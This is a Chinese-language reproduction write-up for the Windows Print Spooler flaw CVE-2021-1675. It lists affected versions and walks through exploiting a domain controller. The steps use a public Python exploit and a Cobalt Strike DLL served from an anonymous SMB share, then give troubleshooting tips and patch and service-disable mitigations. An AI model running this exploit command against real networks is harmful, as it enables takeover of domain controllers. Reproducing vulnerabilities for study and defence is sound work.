## Windows Spooler Service RCE(CVE-2021-1675 )

## 漏洞描述

该漏洞可用于实现 LPE 和 RCE。至于 RCE 部分，您需要一个用户在 Spooler 服务上进行身份验证。但是，这在域环境中仍然很重要。由于通常 DC 会启用 Spooler 服务，因此被入侵的域用户可能会利用此漏洞来控制 DC

## 漏洞影响

> Windows Server 2019 (Server Core installation)

> Windows Server 2019

> Windows Server 2016 (Server Core installation)

> Windows Server 2016

> Windows Server 2012 R2 (Server Core installation)

> Windows Server 2012 R2

> Windows Server 2012 (Server Core installation)

> Windows Server 2012

> Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

> Windows Server 2008 R2 for x64-based Systems Service Pack 1

> Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

> Windows Server 2008 for x64-based Systems Service Pack 2

> Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

> Windows Server 2008 for 32-bit Systems Service Pack 2

> Windows Server, version 2004 (Server Core installation)

> Windows RT 8.1

> Windows 8.1 for x64-based systems

> Windows 8.1 for 32-bit systems

> Windows 7 for x64-based Systems Service Pack 1

> Windows 7 for 32-bit Systems Service Pack 1

> Windows 10 Version 1607 for x64-based Systems

> Windows 10 Version 1607 for 32-bit Systems

> Windows 10 for x64-based Systems

> Windows 10 for 32-bit Systems

> Windows Server, version 20H2 (Server Core Installation)

> Windows 10 Version 20H2 for ARM64-based Systems

> Windows 10 Version 20H2 for 32-bit Systems

> Windows 10 Version 20H2 for x64-based Systems

> Windows 10 Version 2004 for x64-based Systems

> Windows 10 Version 2004 for ARM64-based Systems

> Windows 10 Version 2004 for 32-bit Systems

> Windows 10 Version 21H1 for 32-bit Systems

> Windows 10 Version 21H1 for ARM64-based Systems

> Windows 10 Version 21H1 for x64-based Systems

> Windows 10 Version 1909 for ARM64-based Systems

> Windows 10 Version 1909 for x64-based Systems

> Windows 10 Version 1909 for 32-bit Systems

> Windows 10 Version 1809 for ARM64-based Systems

> Windows 10 Version 1809 for x64-based Systems

> Windows 10 Version 1809 for 32-bit Systems

## 漏洞复现

复现漏洞利用的Windows版本是Windows Server 2019 Version 1809，使用了 https://github.com/cube0x0/CVE-2021-1675 项目的python版本exp。

经过反复测试后，发现远程命令执行需要满足一些条件：

1. 创建的smb服务允许匿名访问。
2. 验证使用普通域用户的用户名和密码。
3. 需要在域环境内。

首先在域控上添加一个普通域用户，设置用户名和密码

![image-20210704080310891](/resource/Windows-Spooler-Service/image-20210704080310891.png)



因为spoolsv.exe是x64的，所以我们这里Cobalt Strike也生成x64的dll

![image-20210704080316757](/resource/Windows-Spooler-Service/image-20210704080316757.png)

按照 https://github.com/cube0x0/CVE-2021-1675 的smb设置方法，在域内一台主机上提供匿名访问权限的共享文件

![image-20210704080320214](/resource/Windows-Spooler-Service/image-20210704080320214.png)

在域内的其他主机上放置好生成的artifact.dll，设置分享目录并允许匿名访问，在域控上必须能直接获取到文件

![image-20210704080323986](/resource/Windows-Spooler-Service/image-20210704080323986.png)



使用exp，参数分别是刚才创建的新域用户的用户名和密码，还有DC的ip，最后是smb共享文件的路径

```
python CVE-2021-1675.py testUser:[email protected] \\192.168.92.130\share\artifact.dll
```

这里会遇到一些坑，如果报错 **Error: code: 0x5 - rpc_s_access_denied** 说明smb还不能匿名访问，如果连续执行成功，但是只复制了dll并未执行，可能是验证用户不是普通域用户账号。

使用Procmon发现测试用的 artifact.dll 已经被spoolsv.exe加载：

![image-20210704080331145](/resource/Windows-Spooler-Service/image-20210704080331145.png)



上线成功

![image-20210704080334640](/resource/Windows-Spooler-Service/image-20210704080334640.png)



## 防御方法

安装微软 **CVE-2021-1675** 漏洞补丁

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

关闭打印机服务

```
Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start " /t REG_DWORD /d "4" /f
```

## 参考文章和项目

- https://github.com/cube0x0/CVE-2021-1675
- https://github.com/afwu/PrintNightmare
- https://blog.csdn.net/ShelleyLiu0415/article/details/47836855
- http://noahblog.360.cn/cve-2021-1675/
- https://github.com/cube0x0/CVE-2021-1675/issues/19